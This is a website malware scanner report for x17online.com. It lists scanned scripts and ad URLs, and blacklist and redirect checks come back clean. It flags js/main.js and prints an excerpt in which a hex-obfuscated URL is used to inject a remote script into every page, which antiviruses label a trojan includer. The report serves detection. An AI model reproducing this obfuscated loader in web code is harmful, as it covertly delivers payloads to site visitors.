New scan:

Malware Scanner report for x17online.com

Malicious/Suspicious/Total urls checked
1/0/18
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/20
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.x17online.com/
200 OK
Content-Length: 68585
Content-Type: text/html
clean
http://www.x17online.com//ajax.googleapis.com/ajax/libs/jquery/2.1.0/jquery.min.js/
200 OK
Content-Length: 68585
Content-Type: text/html
clean
http://www.x17online.com//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/
200 OK
Content-Length: 68585
Content-Type: text/html
clean
http://www.x17online.com/bootstrap/js/bootstrap.min.js
200 OK
Content-Length: 29165
Content-Type: application/javascript
clean
http://www.x17online.com/js/main.js
200 OK
Content-Length: 4212
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var topModuleData; var topModuleCounter = 0;
$(document).ready(function(){
$('.faceOff .face_off_vote').click(function(){
var faceOffId = $(this).parent().parent().find('.faceOffId').val();
voteFaceOff(faceOffId);
});
$('.faceOff .face_off_results').click(function(){
var faceOffId = $(this).parent().parent().find('.faceOffId').val();
viewResults(faceOffId);
});
});
function viewResults(faceOffId) {
$.get(webRoot + "/
... 2604 bytes are skipped ...
ument.createElement('script');
gads.async = true; gads.type = 'text/javascript';
gads.src = '\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x78\x31\x37\x6f\x6e\x6c\x69\x6e\x65\x2e\x63\x6f\x6d\x2f\x68\x6f\x6c\x6c\x79\x77\x6f\x6f\x64\x2d\x62\x72\x65\x61\x6b\x64\x6f\x77\x6e\x2f\x6e\x69\x63\x6f\x6c\x61\x73\x5f\x63\x61\x67\x65\x2f\x64\x65\x66\x61\x75\x6c\x74\x2e\x70\x68\x70';
var node = document.getElementsByTagName('body')[0];
node.parentNode.insertBefore(gads, node);
});

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Includer-BGV [Trj]
GData
Script.Trojan.Agent.L3Q00V

http://jwpsrv.com/library/EjOdqOQBEeKpUhIxOQulpA.js
200 OK
Content-Length: 70706
Content-Type: text/javascript
clean
http://www.google.com/jsapi
200 OK
Content-Length: 24552
Content-Type: text/javascript
clean
http://i.po.st/share/script/post-widget.js
200 OK
Content-Length: 117725
Content-Type: application/x-javascript
clean
http://adkengage.com/pshandler.js?aid=8270&v=7OIDemmNYwBoVSxp7EwPxw%3d%3d&dpid=2768
200 OK
Content-Length: 687
Content-Type: application/x-javascript
clean
http://ib.adnxs.com/ttj?id=2178791&position=above
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Date: Sun, 05 Oct 2014 14:52:34 GMT
Pragma: no-cache
Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D2178791%26position%3Dabove
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3713224178666039979; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly
X-XSS-Protection: 0
clean
http://ib.adnxs.com/bounce?%2fttj%3fid%3d2178791%26position%3dabove
200 OK
Content-Length: 1025
Content-Type: text/html
clean
http://ib.adnxs.com/ttj?ttjb=1&bdc=1412520754&bdh=NRz5zWgVO1L4ZTOhZKa-mDalGl0.'+c+'&id=2178791&position=above
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Date: Sun, 05 Oct 2014 14:52:34 GMT
Pragma: no-cache
Location: http://ib.adnxs.com/bounce?%2Fttj%3Fttjb%3D1%26bdc%3D1412520754%26bdh%3DNRz5zWgVO1L4ZTOhZKa-mDalGl0.%27%2Bc%2B%27%26id%3D2178791%26position%3Dabove
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2486418154245445571; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly
X-XSS-Protection: 0
clean
http://ib.adnxs.com/bounce?%2fttj%3fttjb%3d1%26bdc%3d1412520754%26bdh%3dnrz5zwgvo1l4ztohzka-mdalgl0.%27%2bc%2b%27%26id%3d2178791%26position%3dabove
200 OK
Content-Length: 1295
Content-Type: application/javascript
clean
http://ib.adnxs.com/test404page.js
404 Not Found
Content-Length: 0
Content-Type: text/html
clean
http://ads.rubiconproject.com/ad/8621.js
200 OK
Content-Length: 21299
Content-Type: text/javascript
clean
http://www.x17online.com//ads.incmd10.com/creative/2-002137205-00001j;size=1;tag_id=5746;ref=INSERT_REFERRER_HERE;cb=INSERT_CACHEBUSTER_HERE/
200 OK
Content-Length: 68585
Content-Type: text/html
clean
http://ib.adnxs.com/ttj?id=1500853&position=below
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Date: Sun, 05 Oct 2014 14:52:36 GMT
Pragma: no-cache
Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D1500853%26position%3Dbelow
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2480370617130020616; path=/; expires=Sat, 03-Jan-2015 14:52:36 GMT; domain=.adnxs.com; HttpOnly
X-XSS-Protection: 0
clean
http://ib.adnxs.com/bounce?%2fttj%3fid%3d1500853%26position%3dbelow
200 OK
Content-Length: 1025
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: x17online.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: x17online.com
Referer: http://www.google.com/search?q=x17online.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=x17online.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://x17online.com/

Result: x17online.com is not infected or malware details are not published yet.